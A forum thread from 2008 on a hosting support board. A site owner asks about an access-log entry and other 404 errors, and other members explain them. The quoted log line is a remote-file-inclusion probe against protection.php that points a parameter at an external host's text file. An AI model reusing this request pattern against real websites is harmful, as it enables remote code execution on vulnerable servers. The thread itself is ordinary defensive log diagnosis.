Question about something in Stats/Error Logs...

split-season · May 30th, 2008, 2:57 PM

Hi. I'd just like to ask what this means:

Quote:

/protection.php?action=logout&siteurl=http://rjoos.ch/Reise/images/tOtti/help.txt?
Http Code: 404 Date: May 30 10:32:32 Http Version: HTTP/1.1 Size in Bytes: -
Referer: -
Agent: libwww-perl/5.811

I saw this in my stats log today, and while I don't have any file named as protection.php, this just seems disturbing.

I also saw that in my Error log, 3 files that I don't have are listed:

- robots.txt
- 404.shtml
- protection.php

I know this is the Error log, and that's why they're appearing (: I just want to know if this thing happening is normal or not, why they appear as if someone is trying to reach those files/pages, if I should be alarmed, do something, etc.

And oh, the logs are for the main domain and one of my subdomains (and all directories under it).

Thank you.

**Rick** · May 30th, 2008, 5:18 PM

According to SecurityTracker.com that appears to be someone trying to exploit a script on your site. However, since it returns a 404 code, you don't have that script installed so no harm was done.

The robots.txt file is a file you can place on your site that will direct some, but not all, search engines what files/folders to index and what ones not to index. See The Web Robots Pages for more information. You're seeing this in you log files because these search engines are just looking to see if this file exists.

When someone tries to access a file on your site that doesn't exist, they will usually be directed to a 404.shtml file. If you don't have this file, you may want to create one to help your visitors find what they were looking for. Otherwise they'll just see their Browser's standard 'file not found' message.

The protection.php file is a file that is typically a part of many of the scripts from the codegrrl.com website and is a well known file for being exploited. Also, for our protection, I believe Surpass tries to block use of these scripts.

**Roxy** · May 30th, 2008, 5:44 PM

Quote:

Originally Posted by Rick

The protection.php file is a file that is typically a part of many of the scripts from the codegrrl.com website and is a well known file for being exploited. Also, for our protection, I believe Surpass tries to block use of these scripts.

Unless they are secure, which that site has come along way and a few of the coders/programmers on that site are well known for having secure scripts now.

split-season · May 31st, 2008, 10:04 AM

Thanks guys! Now I can be at ease and continue working on my websites (:

May 30th, 2008, 5:18 PM	#2 (permalink)
Rick Surpass Fan Comfy Contributor Joined in Sep 2004 Hosted on Pass42 278 posts Gave thanks: 4 Thanked 50 times	According to SecurityTracker.com that appears to be someone trying to exploit a script on your site. However, since it returns a 404 code, you don't have that script installed so no harm was done. The robots.txt file is a file you can place on your site that will direct some, but not all, search engines what files/folders to index and what ones not to index. See The Web Robots Pages for more information. You're seeing this in you log files because these search engines are just looking to see if this file exists. When someone tries to access a file on your site that doesn't exist, they will usually be directed to a 404.shtml file. If you don't have this file, you may want to create one to help your visitors find what they were looking for. Otherwise they'll just see their Browser's standard 'file not found' message. The protection.php file is a file that is typically a part of many of the scripts from the codegrrl.com website and is a well known file for being exploited. Also, for our protection, I believe Surpass tries to block use of these scripts. __________________

May 31st, 2008, 10:04 AM	#4 (permalink)
split-season Registered User Fresh Surpasser Joined in Dec 2007 Hosted on SH132 27 posts Gave thanks: 9 Thanked 1 Time in 1 Post	Thanks guys! Now I can be at ease and continue working on my websites (: __________________ PK.NET SH132

Thread Tools	Search this Thread
Show Printable Version Email this Page	Search this Thread: Advanced Search

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)